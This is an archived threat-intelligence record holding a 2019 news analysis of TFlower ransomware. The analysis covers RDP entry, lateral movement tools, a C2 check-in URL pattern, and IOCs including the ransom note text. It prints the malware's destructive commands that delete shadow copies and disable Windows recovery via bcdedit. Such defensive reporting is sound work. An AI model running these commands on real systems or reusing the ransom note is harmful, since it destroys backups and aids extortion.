{
	"id": "4797a26d-925a-4355-be44-3d239e03aafe",
	"created_at": "2026-04-06T00:09:50.997752Z",
	"updated_at": "2026-04-10T03:19:58.759359Z",
	"deleted_at": null,
	"sha1_hash": "a83aad93bc8effc38090bfede64f63c47b4e4c11",
	"title": "TFlower Ransomware - The Latest Attack Targeting Businesses",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1736596,
	"plain_text": "TFlower Ransomware - The Latest Attack Targeting Businesses\r\nBy Lawrence Abrams\r\nPublished: 2019-09-17 · Archived: 2026-04-05 14:27:20 UTC\r\nThe latest ransomware targeting corporate environments is called TFlower and is being installed on networks after attackers\r\nhack into exposed Remote Desktop services.\r\nWith the huge payments being earned by ransomware developers as they target businesses and government agencies, it is\r\nnot surprising to see new ransomware being developed to take advantage of this surge in high ransoms.\r\nSuch is the case with the TFlower ransomware, which was discovered in the wild in early August. At the time it was just\r\nthought to be another generic ransomware, but sources who have performed incident response involving this ransomware\r\nhave told BleepingComputer that its activity is beginning to pick up.\r\nhttps://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nPage 1 of 6\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nPage 2 of 6\n\nVisit Advertiser websiteGO TO PAGE\r\nGaining access via RDP\r\nTFlower is being installed in a corporate network through exposed Remote Desktop services that are being hacked by\r\nattackers.\r\nOnce the attackers gain access to the machine, they will infect the local machine or may attempt to traverse the network\r\nthrough tools such as PowerShell Empire, PSExec, etc.\r\nWhen executed, the ransomware will display a console that shows the activity being performed by the ransomware while it\r\nis encrypting a computer.\r\nTFlower Console\r\nIt then connects back to the command and control server in order to give a status check that it has started encrypting a\r\ncomputer. In one of the samples seen by BleepingComputer, this C2 is located on a hacked wordpress site and uses the\r\nfollowing URL:\r\nhttps://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]\u0026state=start\r\nIt will then attempt to clear the Shadow Volume Copies and execute commands that disable the Windows 10 repair\r\nenvironment.\r\nvssadmin.exe delete shadows /all /quiet\r\nbcdedit.exe /set {default} recoveryenabled no\r\nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit.exe /set {current} recoveryenabled no\r\nbcdedit.exe /set {current} bootstatuspolicy ignoreallfailures\r\nIt also looks for and terminates the Outlook.exe process in order to allow its data files to be open for encrypting.\r\nhttps://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nPage 3 of 6\n\nTerminating the outlook.exe process\r\nIt will then proceed to encrypt the data on the computer, skipping any files in the Windows or Sample Music folders. \r\nWhen encrypting files, it will not add an extension, but will prepend the *tflower marker and what appears to be the\r\nencrypted encryption key for the file as shown below.\r\nEncrypted TFlower File\r\nWhen done encrypting a computer, it will send another status update to the C2 in the form of:\r\nhttps://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]\u0026state=success%20[encrypted_file_count],%20retry%20[r\r\nhttps://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nPage 4 of 6\n\nVictims will now find a ransom notes named !_Notice_!.txt placed throughout the computer and on the Windows Desktop.\r\nThis ransom note will instruct victims to contact the flower.harris@protonmail.com or flower.harris@tutanota.com\r\nemail addresses for payment instructions.\r\nTFlower Ransom Note\r\nIt is not known how much the ransom amounts are at this time.\r\nTFlower is still being researched, so it is not known at this time if there are any weaknesses in the encryption that could\r\nallow a user to get their files back for free.\r\nIOCs\r\nHashes:\r\n6c75998580fb05c01b10f4703299ffd782bec55c8765c030b8a4760fff6045fe\r\nAssociated Files:\r\n!_Notice_!.txt\r\nchilli.exe\r\nRegistry Entries:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \"proxycap\"=\"[path_to]\\[ransomware].exe\"\r\nAssociated Email Addresses:\r\nflower.harris@protonmail.com\r\nflower.harris@tutanota.com\r\nRansom Note Text:\r\n IMPORTANT NOTICE THAT IS URGENT AND TRUE\r\n =================================================================\r\nDear Sir/Ma,\r\nhttps://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nPage 5 of 6\n\nSorry to inform you but many files of your COMPANY has just been ENCRYPTED with a STRONG key.\r\nThis simply means that you will not be able to use your files until it is decrypted by the same key used in encrypting it\r\nTO get the DECRYPT TOOL for your COMPANY, you have to make payment to us so as to recover your files.\r\n NOTE\r\n ======================================================================\r\nYou may upload 1 of your encrypted files to test the decryption for free.\r\nBut, the file should not contain any valuable information.\r\nE-MAIL Address:=\u003e\u003e\r\nflower.harris@protonmail.com\r\nflower.harris@tutanota.com\r\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nhttps://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/"
	],
	"report_names": [
		"tflower-ransomware-the-latest-attack-targeting-businesses"
	],
	"threat_actors": [],
	"ts_created_at": 1775434190,
	"ts_updated_at": 1775791198,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a83aad93bc8effc38090bfede64f63c47b4e4c11.pdf",
		"text": "https://archive.orkl.eu/a83aad93bc8effc38090bfede64f63c47b4e4c11.txt",
		"img": "https://archive.orkl.eu/a83aad93bc8effc38090bfede64f63c47b4e4c11.jpg"
	}
}